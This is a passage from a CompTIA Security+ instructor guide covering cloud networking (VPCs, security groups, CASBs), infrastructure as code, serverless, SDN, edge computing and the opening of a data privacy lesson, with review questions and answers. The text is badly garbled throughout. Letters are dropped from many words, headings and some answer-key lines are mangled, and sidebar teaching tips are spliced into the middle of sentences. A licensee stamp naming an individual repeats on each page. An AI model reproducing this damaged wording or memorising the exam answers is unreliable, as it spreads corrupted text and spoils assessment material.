be configured with a public I in its cloud profile. The Internet gateway performs
network address translation (NAT) to route Internet communications to and from the
instance.

The instance network adapter is not configured with this public IP address. The instance s
IC is configured with an IP address for the subnet. The public address is used by the
virtualization management layer only. Public IP addresses can be assigned from your own
pool or from a CSP-managed service, such as Amazon s Elastic IP (docs.aws.amazon.com/
AWSEC2/latest/UserGuide/elastic-ip-addresses-eip.html).

There are other ways to provision external connectivity for a subnet if it is not
appropriate to make it public:
• NAT gateway—this feature allows an instance to connect out to the Internet or to
other AWS services, but does not allow connections initiated from the Internet.

• VPN—there are various options for establishing connections to and between VPCs
using virtual private networks (VPNs) at the software layer or using CSP-managed
features.

Lesson 15: Implementing Secure Cloud Solutions | Topic 15B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 424 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Show Slide(s) VPCs and Transit Gateways

VPCs and Transit
outing can be configured between subnets within a C. This traffic can be sub ect
Gateways to cloud native ACLs allowing or blocking traffic on the basis of host I s and ports.
Alternatively, traffic could be routed through a virtual firewall instance, or other
security appliance.
Connectivity can also be configured between Cs in the same account or with Cs
belonging to di erent accounts, and between Cs and on premises networks.
Configuring additional Cs rather than subnets within a C allows for a greater
degree of segmentation between instances. A complex network might split segments
between di erent Cs across di erent cloud accounts for performance or
compliance reasons.
Traditionally, VPCs can be interconnected using peering relationships and connected
with on-premises networks using VPN gateways. These one-to-one VPC peering
relationships can uickly become difficult to manage, especially if each C must
interconnect in a mesh-like structure. A transit gateway is a simpler means of managing
these interconnections. Essentially, a transit gateway is a virtual router that handles
routing between the subnets in each attached VPC and any attached VPN gateways
(aws.amazon.com/transit-gateway).

Amazon s white paper sets out options for configuring multi- PC infrastructure in more
detail (d1.awsstatic.com/whitepapers/building-a-scalable-and-secure-multi-vpc-aws-
network-infrastructure.pdf).

Show Slide(s) VPC Endpoints

VPC Endpoints
A VPC endpoint is a means of publishing a service so that it is accessible by instances in
other VPCs using only the AWS internal network and private IP addresses (d1.awsstatic.
com/whitepapers/aws-privatelink.pdf . This means that the traffic is never e posed to
the Internet. There are two types of VPC endpoint: gateway and interface.

Gateway Endpoints
A gateway endpoint is used to connect instances in a C to the A storage and
DynamoD database services. A gateway endpoint is configured as a route to the
service in the VPC's route table.

Interface Endpoints
An interface endpoint makes use of AWS's PrivateLink feature to allow private access to
custom services:
• A custom service provider C is configured by publishing the service with a DN
host name. Alternatively, the service provider might be an Amazon default service
that is enabled as a VPC interface endpoint, such as CloudWatch Events/Logs.

• A C endpoint interface is configured in each service consumer C subnet. The

C endpoint interface is configured with a private I address within the subnet
plus the DNS host name of the service provider.

• ach instance within the C subnet is configured to use the endpoint address to
contact the service provider.

Lesson 15: Implementing Secure Cloud Solutions | Topic 15B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 425

Cloud Firewall Security Show Slide(s)

As in an on premises network, a firewall determines whether to accept or deny discard Cloud irewall ecurity
incoming and outgoing traffic. irewalls work with multiple accounts, Cs, subnets
within VPCs, and instances within subnets to enforce the segmentation required by
the architectural design. egmentation may be needed for many di erent reasons,
including separating workloads for performance and load balancing, keeping data
processing within an isolated segment for compliance with laws and regulations,
and compartmentali ing data access and processing for di erent departments or
functional requirements.
iltering decisions can be made based on packet headers and payload contents at
various layers, identified in terms of the I model
• Network layer layer the firewall accepts or denies connections on the basis of
IP addresses or address ranges and TCP/UDP port numbers (the latter are actually
contained in layer headers, but this functionality is still always described as basic
layer packet filtering .

• Transport layer layer the firewall can store connection states and use rules to
allow established or related traffic. ecause the firewall must maintain a state table
of existing connections, this requires more processing power (CPU and memory).

• Application layer layer the firewall can parse application protocol headers
and payloads such as TT packets and make filtering decisions based on their
contents. This requires even greater processing capacity (or load balancing), or the
firewall will become a bottleneck and increase network latency.

hile you can use cloud based firewalls to implement on premises network security,
here we are primarily concerned with the use of firewalls to filter traffic within and to
and from the cloud itself. uch firewalls can be implemented in several ways to suit
di erent purposes
• As software running on an instance. This sort of host based firewall is identical
to ones that you would configure for an on premises host. It could be a stateful
packet filtering firewall or a web application firewall A with a ruleset tuned to
preventing malicious attacks. The drawback is that the software consumes instance
resources and so is not very efficient. Also, managing the rulesets across many
instances can be challenging.

• As a service at the virtuali ation layer to filter traffic between C subnets and
instances. This e uates to the concept of an on premises network firewall.

Native cloud application aware firewalls incur transaction costs, typically calculated on
time deployed and traffic volume. These costs might be a reason to choose a third
party solution instead of the native control.

Security Groups Show Slide(s)

In A , basic packet filtering rules managing traffic that each instance will accept can Security Groups
be managed through security groups (docs.aws.amazon.com/vpc/latest/userguide/
VPC_SecurityGroups.html). A security group provides stateful inbound and outbound Teaching
filtering at layer . The stateful filtering property means that it will allow established Tip
and related traffic if a new connection has been accepted. A security group is a
The default security group allows any outbound traffic and any inbound traffic from collection of firewall
rules that can be
instances also bound to the default security group. A custom security group sets the
applied to one or
ports and endpoints that are allowed for inbound and outbound traffic. There are more instances,
no deny rules for security groups any traffic that does not match an allow rule is working like a virtual
dropped. Conse uently, a custom group with no rules will drop all network traffic. host firewall.

Lesson 15: Implementing Secure Cloud Solutions | Topic 15B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 426 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Multiple instances can be assigned to the same security group, and instances within
the same subnet can be assigned to di erent security groups. ou can assign multiple
security groups to the same instance. You can also assign security groups to VPC
endpoint interfaces.

Adding a custom security group when launching a new instance in A S EC . This policy allows SS
access from a single IP address (redacted) and access to TTPS from any IP address.

Most cloud providers support similar filtering functionality, though they may be
implemented di erently. or e ample, in A ure, network security groups can be
applied to network interfaces or to subnets (docs.microsoft.com/en-us/azure/virtual-
network/security-overview).

Show Slide(s) Cloud Access Security Brokers

Cloud Access Security
A cloud access security broker (CASB) is enterprise management software designed
Brokers to mediate access to cloud services by users across all types of devices. CASB vendors
include Blue Coat, now owned by Symantec (broadcom.com/products/cyber-security/
information-protection/cloud-application-security-cloudsoc), SkyHigh Networks, now
owned by MacAfee (skyhighnetworks.com , orcepoint forcepoint.com/product/casb-
cloud-access-security-broker), Microsoft Cloud App Security (microsoft.com/en-us/
microsoft enterprise mobility security cloud app security), and Cisco Cloudlock
(cisco.com/c/en/us/products/security/cloudlock/index.html).
CASBs provide you with visibility into how clients and other network nodes are using
cloud services. Some of the functions of a CASB are:
• Enable single sign-on authentication and enforce access controls and authorizations
from the enterprise network to the cloud provider.

• Scan for malware and rogue or non-compliant device access.

• Monitor and audit user and resource activity.

Lesson 15: Implementing Secure Cloud Solutions | Topic 15B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 427

• Mitigate data e filtration by preventing access to unauthori ed cloud services from

managed devices.

In general, CASBs are implemented in one of three ways:

• orward pro y this is a security appliance or host positioned at the client network
edge that forwards user traffic to the cloud network if the contents of that traffic
comply with policy. This re uires configuration of users' devices or installation of
an agent. In this mode, the pro y can inspect all traffic in real time, even if that
traffic is not bound for sanctioned cloud applications. The problem with this mode
is that users may be able to evade the proxy and connect directly. Proxies are
also associated with poor performance as without a load balancing solution, they
become a bottleneck and potentially a single point of failure.

• everse pro y this is positioned at the cloud network edge and directs traffic to
cloud services if the contents of that traffic comply with policy. This does not re uire
configuration of the users' devices. This approach is only possible if the cloud
application has proxy support.

• Application programming interface (API)—rather than placing a CASB appliance

or host inline with cloud consumers and the cloud services, an API-based CASB
uses brokers connections between the cloud service and the cloud consumer. or
example, if a user account has been disabled or an authorization has been revoked
on the local network, the CASB would communicate this to the cloud service and use
its API to disable access there too. This depends on the API supporting the range
of functions that the CASB and access and authorization policies demand. CASB
solutions are uite likely to use both pro y and A I modes for di erent security
management purposes.

Next-Generation Secure Web Gateway

Enterprise networks often make use of secure web gateways (SWG). An on-premises
is a pro y based firewall, content filter, and intrusion detection prevention
system that mediates user access to Internet sites and services. A next-generation
SWG, as marketed by Netskope (netskope.com/products/next-gen-swg), combines
the functionality of an SWG with that of data loss prevention (DLP) and a CASB to
provide a wholly cloud-hosted platform for client access to websites and cloud apps.
This supports an architecture defined by artner as secure access service edge A
(scmagazine.com/home/opinion/secure-access-service-edge-sase-key-points-for-early-
adopters).

Lesson 15: Implementing Secure Cloud Solutions | Topic 15B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 428 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
Cloud Security Solutions
Answer the following questions:

1. Describe some key considerations that should be made when hosting data
or systems via a cloud solutions provider.

Integrate auditing and monitoring procedures and systems with on-premises detection,
identify responsibility for implementing security controls (such as patching or backup),
identify performance metrics in an LA, and assess risks to privacy and confidentiality
from breaches at the service provider.

2. True or false? The account with which you register for the CSP services is
not an account with root privileges.

alse. This account is the root account and has full privileges. It should not be used for
day to day administration or configuration.

3. Which security attribute is ensured by monitoring API latency and

correcting any problems quickly?

This ensures the availability of services.

4. What format is often used to write permissions statements for cloud

resource policies?

JavaScript Object Notation (JSON).

5. True or false? A customer is limited to creating one VPC per account.

alse. There are limits to the number of virtual private clouds Cs that can be
created, but more than one is allowed.

6. hat eature allo s ou to filter tra c arri in at an instance

This is accomplished by assigning the instance to a security group with the relevant
policy configured.

7. What is a cloud access security broker (CASB)?

Enterprise management software mediating access to cloud services by users to

enforce information and access policies and audit usage.

Lesson 15: Implementing Secure Cloud Solutions | Topic 15B

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 429

Topic 15C
Summarize Infrastructure
as ode oncepts

EXAM OBJECTIVES COVERED Teaching

2.2 Summarize virtualization and cloud computing concepts Tip
This topic completes
the block on
development/cloud
Coupled with the use of virtualization and the cloud is the idea of continuous delivery
by looking at some of
models for automation and service integration. These technologies can be used the more advanced
together to deliver an infrastructure as code model of provisioning networks and hosts technologies and
to support application services. applications of
DevSecOps principles.

Services Integration and Microservices Show Slide(s)

In the early days of computer networks, architecture was focused on the provision
Services Integration
of server machines and intermediate network systems (switches and routers). and Microservices
Architectural choices centered around where to place a "box" to run monolithic
network applications such as routing, security, address allocation, name resolution, Teaching
file sharing, email, and so on. ith virtuali ation, the provision of these applications Tip
is much less dependent on where you put the box and the OS that the box runs. Contrast the legacy
irtuali ation helps to make the design architecture fit to the business re uirement IT focus on deploying
rather than accommodate the business work ow to the platform re uirement. boxes with the
modern paradigm of
Service-Oriented Architecture (SOA) abstracted, virtualized
compute, storage,
Service-oriented architecture (SOA) conceives of atomic services closely mapped and network capacity
that can be spun up,
to business work ows. ach service takes defined inputs and produces defined
perform a workload,
outputs. The service may itself be composed of sub-services. The key features of and then released for
a service function are that it is self-contained, does not rely on the state of other the next task.
services, and exposes clear input/output (I/O) interfaces. Because each service has a
simple interface, interoperability is made much easier than with a complex monolithic
application. The implementation of a service does not constrain compatibility choices
for client services, which can use a di erent platform or development language. This
independence of the service and the client requesting the service is referred to as
loose coupling.

Microservices
Microservice-based development shares many similarities with Agile software project
management and the processes of continuous delivery and deployment. It also shares
roots with the Unix philosophy that each program or tool should do one thing well.
The main di erence between A and microservices is that A allows a service to be
built from other services. By contrast, each microservice should be capable of being
developed, tested, and deployed independently. The microservices are said to be highly
decoupled rather than ust loosely decoupled.

Lesson 15: Implementing Secure Cloud Solutions | Topic 15C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 430 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Services Integration and Orchestration

Services integration refers to ways of making these decoupled service or microservice
components work together to perform a work ow. here A used the concept of
a enterprise service bus, microservices integration and cloud services/virtualization/
automation integration generally is very often implemented using orchestration
tools. Where automation focuses on making a single, discrete task easily repeatable,
orchestration performs a se uence of automated tasks. or e ample, you might
orchestrate adding a new VM to a load-balanced cluster. This end-to-end process might
include provisioning the M, configuring it, adding the new M to the load balanced
cluster, and reconfiguring the load balancing weight distribution given the new cluster
configuration. In doing this, the orchestrated steps would have to run numerous
automated scripts or API service calls.
or orchestration to work properly, automated steps must occur in the right se uence,
taking dependencies into account; it must provide the right security credentials at
every step along the way; and it must have the rights and permissions to perform
the defined tasks. rchestration can automate processes that are comple , re uiring
dozens or hundreds of manual steps.
Cloud orchestration platforms connect to and provide administration, management,
and orchestration for many popular cloud platforms and services. One of the
advantages of using a third-party orchestration platform is protection from vendor
lock in. If you wish to migrate from one cloud provider to another, or wish to move to a
multi cloud environment, automated work ows can often be adapted for use on new
platforms. Industry leaders in this space include Chef (chef.io), Puppet (puppet.com),
Ansible (ansible.com), and Kubernetes (kubernetes.io).

Show Slide(s) Application Programming Interfaces

Application
Whether based SOA or microservices, service integration, automation, and
Programming orchestration all depend on application programming interfaces (APIs). The service API
Interfaces is the means by which external entities interact with the service, calling it with expected
parameters and receiving the expected output. There are two predominant "styles" for
creating web application APIs:
• Simple Object Access Protocol (SOAP)—uses XML format messaging and has a
number of extensions in the form of Web Services (WS) standards that support
common features, such as authentication, transport security, and asynchronous
messaging. SOAP also has a built-in error handling.

• epresentational tate Transfer T where A is a tightly specified protocol,

REST is a looser architectural framework, also referred to as RESTful APIs. Where a
SOAP request must be sent as a correctly formatted XML document, a REST request
can be submitted as an HTTP operation/verb (GET or POST for example). Each
resource or endpoint in the API, expressed as a noun, should be accessed via a
single URL.

Show Slide(s) Serverless Architecture

Serverless Architecture
Serverless is a modern design pattern for service delivery. It is strongly associated
with modern web applications most notably Net i aws.amazon.com/solutions/
case studies net i and aws lambda)—but providers are appearing with products
to completely replace the concept of the corporate LAN. With serverless, all the
architecture is hosted within a cloud, but unlike "traditional" virtual private cloud (VPC)
o erings, services such as authentication, web applications, and communications
aren't developed and managed as applications running on VM instances located within
the cloud. Instead, the applications are developed as functions and microservices, each

Lesson 15: Implementing Secure Cloud Solutions | Topic 15C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 431

interacting with other functions to facilitate client requests. When the client requires
some operation to be processed, the cloud spins up a container to run the code,
performs the processing, and then destroys the container. Billing is based on execution
time, rather than hourly charges. This type of service provision is also called function
as a service aa . aa products include A Lambda aws.amazon.com/lambda),
oogle Cloud unctions cloud.google.com/functions , and Microsoft A ure unctions
(azure.microsoft.com/services/functions).
The serverless paradigm eliminates the need to manage physical or virtual server
instances, so there is no management e ort for software and patches, administration
privileges, or file system security monitoring. There is no re uirement to provision
multiple servers for redundancy or load balancing. As all of the processing is taking
place within the cloud, there is little emphasis on the provision of a corporate network.
This underlying architecture is managed by the service provider. The principal
network security job is to ensure that the clients accessing the services have not been
compromised in a way that allows a malicious actor to impersonate a legitimate user.
This is a particularly important consideration for the developer accounts and devices
used to update the application code underpinning the services. These workstations
must be fully locked down, running no other applications or web code than those
necessary for development.
Serverless does have considerable risks. As a new paradigm, use cases and best
practices are not mature, especially as regards security. There is also a critical and
unavoidable dependency on the service provider, with limited options for disaster
recovery should that service provision fail.
Serverless architecture depends heavily on the concept of event-driven orchestration
to facilitate operations. or e ample, when a client connects to an application, multiple
services will be called to authenticate the user and device, identify the device location
and address properties, create a session, load authorizations for the action, use
application logic to process the action, read or commit information from a database,
and write a log of the transaction. This design logic is di erent from applications
written to run in a "monolithic" server-based environment. This means that adapting
e isting corporate software will re uire substantial development e ort.

Infrastructure as Code Show Slide(s)

The use of cloud technologies encourages the use of scripted approaches to Infrastructure as Code
provisioning, rather than manually making configuration changes, or installing patches.
An approach to infrastructure management where automation and orchestration fully
replace manual configuration is referred to as infrastructure as code (IaC).
ne of the goals of IaC is to eliminate snow ake systems. A snow ake is a
configuration or build that is di erent from any other. The lack of consistency or
drift—in the platform environment leads to security issues, such as patches that
have not been installed, and stability issues, such as scripts that fail to run because of Show Slide(s)
some small configuration di erence. y re ecting manual configuration of any kind,
IaC ensures idempotence. Idempotence means that making the same call with the oftware Defined
same parameters will always produce the same result. Note that IaC is not simply a Networking
matter of using scripts to create instances. Running scripts that have been written ad
hoc is ust as likely to cause environment drift as manual configuration. IaC means Teaching
using carefully developed and tested scripts and orchestration runbooks to generate Tip
consistent builds. You can refer students
to Cisco's website for
more information
o t are efined et or in about SDN (cisco.
com/c/en/us/
IaC is partly facilitated by physical and virtual network appliances that are fully solutions/software-
configurable via scripting and A Is. As networks become more comple perhaps defined networking
involving thousands of physical and virtual computers and appliances—it becomes overview.html).

Lesson 15: Implementing Secure Cloud Solutions | Topic 15C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 432 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

more difficult to implement network policies, such as ensuring security and managing
traffic ow. ith so many devices to configure, it is better to take a step back and
consider an abstracted model about how the network functions. In this model, network
functions can be divided into three "planes":
• Control plane makes decisions about how traffic should be prioriti ed and
secured, and where it should be switched.

• Data plane handles the actual switching and routing of traffic and imposition of
security access controls.

• Management plane monitors traffic conditions and network status.

A so t are defined net or in application can be used to define policy

decisions on the control plane. These decisions are then implemented on the
data plane by a network controller application, which interfaces with the network
devices using APIs. The interface between the SDN applications and the SDN
controller is described as the "northbound" API, while that between the controller
and appliances is the "southbound" API. SDN can be used to manage compatible
physical appliances, but also virtual switches, routers, and firewalls. The architecture
supporting rapid deployment of virtual networking using general-purpose VMs
and containers is called network functions virtualization (NFV) (redhat.com/en/
topics/virtualization/what-is-nfv).
This architecture saves network and security administrators the job and complexity of
configuring each appliance with proper settings to enforce the desired policy. It also
allows for fully automated deployment (or provisioning) of network links, appliances,
and servers. This makes SDN an important part of the latest automation and
orchestration technologies.

Show Slide(s) o t are efined isi ilit

oftware Defined
Where SDN addresses secure network "build" solutions, so t are defined isi ilit
Visibility (SDV) supports assessment and incident response functions. Visibility is the near real-
time collection, aggregation, and reporting of data about network traffic ows and the
configuration and status of all the hosts, applications, and user accounts participating
in it.
SDV can help the security data collection process by gathering statistics from the
forwarding systems and then applying a classification scheme to those systems to
detect network traffic that deviates from baseline levels gigamon.com/content/dam/
resource library english white paper wp software defined visibility new paradigm
for-it.pdf). This can provide you with a more robust ability to detect anomalies—
anomalies that may suggest an incident. SDV therefore gives you a high-level
perspective of network ow and endpoint user account behavior that may not be
possible with traditional appliances. SDV supports designs such as zero trust and
east/west (paloaltonetworks.com/cyberpedia/what-is-a-zero-trust-architecture), plus
implementation of security orchestration and automated response (SOAR).

Show Slide(s) Fog and Edge Computing

og and dge
Most of the cloud services we have considered so far are "user-facing." They support
Computing applications that human users interact with, such as video streaming, CRM, business
analytics, email and conferencing, endpoint protection analytics, and so on. However,
a very large and increasing amount of cloud data processing takes place with data
generated by Internet of Things (IoT) devices and sensors. Industrial processes and
even home automation are availability focused. hile confidentiality and integrity are
still important concerns, service interruption in an operational technology network can

Lesson 15: Implementing Secure Cloud Solutions | Topic 15C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 433

be physically dangerous. Consequently, there is a strong requirement to retrieve and

analzye IoT data with low latency.
A traditional data center architecture does not meet this requirement very well.
Sensors are quite likely to have relatively low-bandwidth, higher latency WAN links to
data networks. Sensors may generate huge quantities of data only a selection of which
needs to be prioritized for analysis. Fog computing, developed by Cisco (cisco.com/c/
dam/en_us/solutions/trends/iot/docs/computing-overview.pdf), addresses these
requirements by placing fog node processing resources close to the physical location
for the IoT sensors. The sensors communicate with the fog node, using i i, ig ee,
or , and the fog node prioriti es traffic, analy es and remediates alertable
conditions, and backhauls remaining data to the data center for storage and low-
priority analysis.
Edge computing is a broader concept partially developed from fog computing and
partially evolved in parallel to it. og computing is now seen as working within the
concept of edge computing. Edge computing uses the following concepts:
• Edge devices are those that collect and depend upon data for their operation.
or e ample, a thermometer in an AC system collects temperature data the
controller in an HVAC system activates the electromechanical components to
turn the heating or air conditioning on or o in response to ambient temperature
changes. The impact of latency becomes apparent when you consider edge devices
such as self driving automobiles.

• Edge gateways perform some pre-processing of data to and from edge devices
to enable prioritization. They also perform the wired or wireless connectivity to
transfer data to and from the storage and processing networks.

• og nodes can be incorporated as a data processing layer positioned close to the

edge gateways, assisting the prioritization of critical data transmission.

• The cloud or data center layer provides the main storage and processing resources,
plus distribution and aggregation of data between sites.

In security terms, the fog node or edge gateway layers represent high-value targets for
both denial of service and data e filtration attacks.

The controversy over the use of uawei s e uipment within G and edge networks illustrates
the risks and concerns over supply chains and trusted computing (threatpost.com/huawei-
g-security-implications 1 6).

Lesson 15: Implementing Secure Cloud Solutions | Topic 15C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 434 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Review Activity:
Infrastructure as Code
Answer the following questions:

1. A company has been using a custom-developed client-server application

for customer management, accessed from remote sites over a VPN. Rapid
overseas growth has led to numerous complaints from employees that the
s stem su ers man outa es and cannot cope ith the increased num er
of users and access by client devices such as smartphones. What type of
architecture could produce a solution that is more scalable?

Microservices is a suitable architecture for replacing monolithic client-server

applications that do not meet the needs of geographically diverse, mobile workforces.
By breaking the application up into microservice components and hosting these in
cloud containers, performance can scale to demand. Web-based APIs are better suited
to browser based access on di erent device types.

2. You have been asked to produce a summary of pros and cons for the
products Chef and Puppet. What type of virtualization or cloud computing
technology do these support?

These are orchestration tools. Orchestration facilitates "automation of automation,"

ensuring that scripts and API calls are made in the right order and at the right time to
support an overall work ow.

3. True or false? Serverless means running computer code on embedded

systems.

alse. ith serverless, the provision of functions running in containers is abstracted

from the underlying server hardware. The point is that as a consumer, you do not
perform any server management. The servers are still present, but they are operated
and maintained by the cloud service provider.

4. A compan s e ser ices are su erin per ormance issues ecause

updates keep failing to run on certain systems. What type of architecture
could address this issue?

Infrastructure as Code (IaC) means that provisioning is performed entirely from

standard scripts and configuration data. The absence of manual configuration
ad ustments or ad hoc scripts to change settings is designed to eliminate configuration
drift so that updates run consistently between the development and production
environments.

5. What is SDV?

oftware defined visibility D gives A I based access to network infrastructure

and hosts so that configuration and state data can be reported in near real time. This
facilitates greater automation in models and technologies such as zero trust, inspection
of east west data center traffic, and use of security orchestration and automated
response (SOAR) tools.

Lesson 15: Implementing Secure Cloud Solutions | Topic 15C

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 435

Lesson 15
Summary
You should be able to summarize virtualization and cloud computing concepts and Teaching
implement cloud security controls for compute, storage, and network functions. Tip
Check that students
Guidelines for Implementing Secure Cloud Solutions are confident about
the content that has
been covered. If there
ollow these guidelines for deploying or e tending use of cloud and virtuali ation
is time, revisit any
infrastructure: content examples that
• Assess re uirements for availability and confidentiality that will determine the they have questions
about. If you have
appropriate cloud deployment model (public, hosted private, private, community, used all the available
or hybrid . time for this lesson
block, note the issues,
• Identify a service provisioning model (software, platform, or infrastructure) that best
and schedule time for
fits the application re uirement, given available development resources and the a review later in the
degree of customization required. course.
• Consider whether the service or business need could be better supported by
advanced concepts:

• Microservices, serverless, and orchestration to focus on work ow re uirements

rather than server administration.
• IaC, SDN, and SDV for automated platform provisioning.
• Edge/fog computing to ensure availability and low latency in embedded systems
and IoT networks.

• If using a CSP, create an SLA and security responsibility matrix to identify who
will perform security-critical tasks. Ensure that reporting and monitoring of cloud
security data is integrated with on-premises monitoring and incident response.
• If using on-premises virtualization or a private data center, ensure robust
procedures for developing and deploying virtual machines and protecting
hypervisor security.
• Configure native or third party security controls to protect cloud services

• or compute resources, ensure isolation of workloads and dynamic resource

allocation.
• or storage resources, provision high availability through local or one based
replication.
• or network resources, isolate instances to appropriate security ones through
virtual networks and provision native or vendor firewalls and security to perform
re uest filtering and authori ation.
• rovision secure accounts for developer access, protected by M A, and ensure
e ective management of A I and keys and other secrets.

Lesson 15: Implementing Secure Cloud Solutions

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 Lesson 16
Explaining Data Privacy and
rotection oncepts

LESSON INTRODUCTION Teaching

Tip
If people are an organization's most important asset, then data comes a close second. Data breaches and
The rapid adoption of cybersecurity awareness and technologies has come about privacy compliance
because of the huge reputational and financial costs of high profile data and privacy issues provide
breaches. It is usually data that the threat actors want, and data that the whole system powerful business
needs to improve
is set up to protect.
cybersecurity. This
The confidentiality, integrity, and availability security attributes of data processing lesson completes
and storage are ensured through a mixture of managerial, operational, and technical the "protect" theme
by collecting the
controls. Along with security, you should also be able to assess privacy factors when
ob ectives and content
collecting and storing data, and identify how processes must be shaped by legislative examples related to
and regulatory compliance. data confidentiality
and privacy.

Lesson Objectives
In this lesson, you will:
• plain privacy and data sensitivity concepts.

• plain privacy and data protection controls.

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 438 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Topic 16A
Explain Privacy and Data
Sensiti ity oncepts

Teaching EXAM OBJECTIVES COVERED

Tip 2.1 Explain the importance of security concepts in an enterprise environment
5.3 Explain the importance of policies to organizational security
This lesson focuses
on ob ective . , but
5.5 Explain privacy and sensitive data concepts in relation to security
does include some
data content examples A detailed understanding of privacy and data sensitivity concepts will help you
from . and . as to operate within an overall data governance team. Data security and privacy
well.
are areas where policy and procedure are as important as technical controls in
This topic focuses ensuring compliance. These policies and procedures may also need to be expressed
on organizational
procedures and in agreements with e ternal partners, suppliers, and customers. As a security
institutional roles, with professional, you will need to select and apply these policies, procedures, and
technical controls left agreements wisely.
to the next topic.
Show Slide(s) Privacy and Sensitive Data Concepts
rivacy and ensitive
The value of information assets can be thought of in terms of how a compromise of
Data Concepts the data's security attributes of the confidentiality, integrity, and availability CIA triad
would impact the organi ation. hen surveying information within an organi ation, it
Teaching is important not to solely judge how secretly it might need to be kept, but how the data
Tip is used within work ows. or e ample, the risk to confidentiality of public information
Do not overlook is none istent. The risk to availability, however, could have significant impacts
the importance of on work ows.
availability.
Make sure students
Data must be kept securely within a processing and storage system that enforces
can distinguish CIA attributes. In practice, this will mean a file or database management system
security requirements that provides read or read write access to authori ed and authenticated accounts
from privacy or denies access otherwise by being encrypted, for instance . As distinct from this
requirements. security re uirement, you also need to consider the impact of privacy in shaping
data governance.

Privacy versus Security

hile data security is important, privacy is an e ually vital factor. rivacy is a data
governance re uirement that arises when collecting and processing personal data.
ersonal data is any information about an identifiable individual person, referred
to as the data sub ect. here data security controls focus on the CIA attributes of
the processing system, privacy re uires policies to identify private data, ensure that
storage, processing, and retention is compliant with relevant regulations, limit access
to the private data to authori ed persons only, and ensure the rights of data sub ects to
review and remove any information held about them are met.

Information Life Cycle Management

An information life cycle model identifies discrete steps to assist security and privacy
policy design. Most models identify the following general stages:

esson 16 Explaining ata Privacy and Protection Concepts | Topic 16A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 The Official CompTIA Security+ Instructor Guide (Exam SY0-601) | 439

• Creation collection data may be generated by an employee or automated system,

or it may be submitted by a customer or supplier. At this stage, the data needs to be
classified and tagged.

• Distribution use data is made available on a need to know basis for authori ed
uses by authenticated account holders and third parties.

• etention data might have to be kept in an archive past the date when it is still
used for regulatory reasons.

• Disposal when it no longer needs to be used or retained, media storing data assets
must be saniti ed to remove any remnants.

Information management is a massive task in any organization. ost schemes focus on

structured data (that is, information that is stored in a directory hierarchy and subject
to administrative access controls). anaging and classifying unstructured data (emails,
chat sessions, telephone calls, and so on) is an even more daunting task, though software
solutions designed to tackle this problem are available.

Data Roles and Responsibilities Show Slide(s)

A data governance policy describes the security controls that will be applied to protect Data Roles and
data at each stage of its life cycle. There are important institutional governance roles Responsibilities
for oversight and management of information assets within the life cycle
• Data owner a senior e ecutive role with ultimate responsibility for maintaining
the confidentiality, integrity, and availability of the information asset. The owner is
responsible for labeling the asset such as determining who should have access and
determining the asset's criticality and sensitivity and ensuring that it is protected
with appropriate controls access control, backup, retention, and so forth . The
owner also typically selects a steward and custodian and directs their actions and
sets the budget and resource allocation for sufficient controls.

• Data steward this role is primarily responsible for data uality. This involves tasks
such as ensuring data is labeled and identified with appropriate metadata and that
data is collected and stored in a format and with values that comply with applicable
laws and regulations.

• Data custodian this role handles managing the system on which the data assets
are stored. This includes responsibility for enforcing access control, encryption, and
backup recovery measures.

• ata ri ac cer this role is responsible for oversight of any personally

identifiable information II assets managed by the company. The privacy officer
ensures that the processing, disclosure, and retention of II complies with legal and
regulatory frameworks.

In the conte t of legislation and regulations protecting personal privacy, the following
two institutional roles are important:
• Data controller the entity responsible for determining why and how data is
stored, collected, and used and for ensuring that these purposes and means are
lawful. The data controller has ultimate responsibility for privacy breaches, and is
not permitted to transfer that responsibility.

• Data processor an entity engaged by the data controller to assist with technical
collection, storage, or analysis tasks. A data processor follows the instructions of a
data controller with regard to collection or processing.

esson 16 Explaining ata Privacy and Protection Concepts | Topic 16A

LICENSED FOR USE ONLY BY: MORGAINE SEYMOUR · 8317851 · AUG 30 2021
 440 | The Official CompTIA Security+ Instructor Guide (Exam SY0-601)

Data controller and processor tend to be organi ational roles rather than individual
ones. or e ample, if idget.foo collects personal data to operate a webstore on its
own cloud, it is a data collector and data processor. If Widget.foo passes aggregate
data to rommet.foo asking them to run profitability analytics for di erent customer
segments on its AI backed cloud, rommet.foo is a data processor acting under the
instruction of Widget.foo. Within the Grommet.foo and Widget.foo companies, the data
